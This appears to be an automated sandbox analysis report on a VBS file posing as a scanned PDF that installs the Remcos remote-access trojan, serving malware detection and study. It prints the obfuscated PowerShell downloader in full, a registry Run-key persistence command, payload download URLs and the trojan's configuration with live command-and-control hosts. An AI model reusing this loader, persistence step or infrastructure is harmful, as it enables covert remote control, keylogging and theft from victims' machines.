msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)", ProcessId: 7044, ProcessName: cmd.exe
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned_22C-6e24090516030.pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned_22C-6e24090516030.pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned_22C-6e24090516030.pdf.vbs", ProcessId: 7784, ProcessName: wscript.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. 
DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali. onowB ufeGelaBMorbCT,anlmod I H feBossnSwe.tAvec ');P

              Stealing of Sensitive Information

Source: Registry Key set; Author: Joe Security; Data: Details: 7C 83 C8 BE 09 AB 22 9D 61 24 63 C2 51 AF C9 93 4A D0 6B C7 FE 66 07 B4 3E A1 E0 A7 85 6B 49 B5 53 A0 32 AE FE B5 37 83 9A C0 EF C4 01 F9 D6 23 59 E6 5E 11 DB 95 77 20 4E 7F 91 39 3B 40 84 5C , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 7092, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-K8KWVT\exepath
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-21T17:07:56.585178+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49975 | 193.187.91.214 | 65253 | TCP
2024-10-21T17:07:57.542508+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49976 | 193.187.91.214 | 53241 | TCP
2024-10-21T17:07:59.126300+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 49977 | 178.237.33.50 | 80 | TCP
2024-10-21T17:07:53.024386+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49973 | 199.103.62.205 | 443 | TCP

              AV Detection

Source: 00000009.00000003.1938941786.0000000009B41000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Remcos {"Host:Port:Password": ["blackass.duckdns.org:65253:1", "blackass.duckdns.org:53241:1"], "Assigned name": "Rm", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-K8KWVT", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: Yara match; File source: 00000009.00000002.2629630958.0000000009B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000003.1938941786.0000000009B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2629630958.0000000009B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2629630958.0000000009AAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.5% probability
              Source: unknown | HTTPS traffic detected: 199.103.62.205:443 -> 192.168.2.11:49736 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 199.103.62.205:443 -> 192.168.2.11:49973 version: TLS 1.2
              Source: Binary string: cqm.Core.pdb | source: powershell.exe, 00000006.00000002.1726800526.00000000079E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb | source: powershell.exe, 00000006.00000002.1726800526.000000000796E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb* | source: powershell.exe, 00000006.00000002.1726800526.00000000079E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk | source: powershell.exe, 00000006.00000002.1726800526.000000000796E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb^R | source: powershell.exe, 00000006.00000002.1726800526.00000000079E9000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49976 -> 193.187.91.214:53241
              Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49975 -> 193.187.91.214:65253
              Source: Malware configuration extractor | URLs: blackass.duckdns.org
              Source: global traffic | TCP traffic: 193.187.91.214 ports 65253,2,3,53241,5,6
              Source: unknown | DNS query: name: blackass.duckdns.org
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
              Source: global traffic | TCP traffic: 192.168.2.11:49975 -> 193.187.91.214:65253
              Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
              Source: Joe Sandbox View | IP Address: 199.103.62.205
              Source: Joe Sandbox View | IP Address: 178.237.33.50
              Source: Joe Sandbox View | ASN Name: OBE-EUROPEObenetworkEuropeSE
              Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.11:49977 -> 178.237.33.50:80
              Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49973 -> 199.103.62.205:443
              Source: global traffic | HTTP traffic detected: GET /Mandschauvinisme.snp HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: www.groupriam.com | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /PrOrl135.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: www.groupriam.com | Cache-Control: no-cache
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic | DNS traffic detected: DNS query: gormezl_6777.6777.6777.677e
              Source: global traffic | DNS traffic detected: DNS query: www.groupriam.com
              Source: global traffic | DNS traffic detected: DNS query: blackass.duckdns.org
              Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
              Source: wscript.exe, 00000000.00000003.1350830060.0000018D175A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1352705520.0000018D175AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: wscript.exe, 00000000.00000002.1352705520.0000018D175AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: powershell.exe, 00000004.00000002.1440004827.00000229E7F5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://groupriam.com
              Source: powershell.exe, 00000004.00000002.1465567193.00000229F6255000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1718585876.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000006.00000002.1703384031.00000000050E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.1440004827.00000229E61E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1703384031.0000000004F91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000006.00000002.1703384031.00000000050E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000004.00000002.1440004827.00000229E7F5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.groupriam.com
              Source: powershell.exe, 00000004.00000002.1440004827.00000229E61E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.1703384031.0000000004F91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB_q
              Source: powershell.exe, 00000004.00000002.1440004827.00000229E77A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1440004827.00000229E6407000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1703384031.00000000050E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bruta.pl/Mandschauvinisme.snp
              Source: powershell.exe, 00000006.00000002.1718585876.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000006.00000002.1718585876.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000006.00000002.1718585876.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000006.00000002.1703384031.00000000050E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.1440004827.00000229E6DA2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
              Source: powershell.exe, 00000004.00000002.1473366610.00000229FE7EA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsofd
              Source: powershell.exe, 00000004.00000002.1465567193.00000229F6255000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1718585876.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000004.00000002.1440004827.00000229E6407000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1440004827.00000229E7EF6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.groupriam.com
              Source: powershell.exe, 00000004.00000002.1440004827.00000229E77A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1440004827.00000229E6407000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1703384031.00000000050E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.groupriam.com/Mandschauvinisme.snp
              Source: unknown | Network traffic detected: HTTP traffic on port 49973 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49973
              Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736

              E-Banking Fraud

              Source: Yara match | File source: 00000009.00000002.2629630958.0000000009B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000009.00000003.1938941786.0000000009B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000009.00000002.2629630958.0000000009B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000009.00000002.2629630958.0000000009AAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              System Summary

              Source: amsi32_7216.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7972, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7216, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. 
DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali.
              Source: Scanned_22C-6e24090516030.pdf.vbs | Initial sample: Strings found which are bigger than 50
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"
              Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 6622
              Source: unknown | Process created: Commandline size = 6622
              Source: amsi32_7216.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7972, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7216, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@16/10@4/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Sttefiskenes.Tav
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-K8KWVT
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfwzfhji.lxz.ps1
              Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned_22C-6e24090516030.pdf.vbs"
              Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = 'Spejlingernes.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7972
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7216
              Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\System32\PING.EXE | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. 
DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali.
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
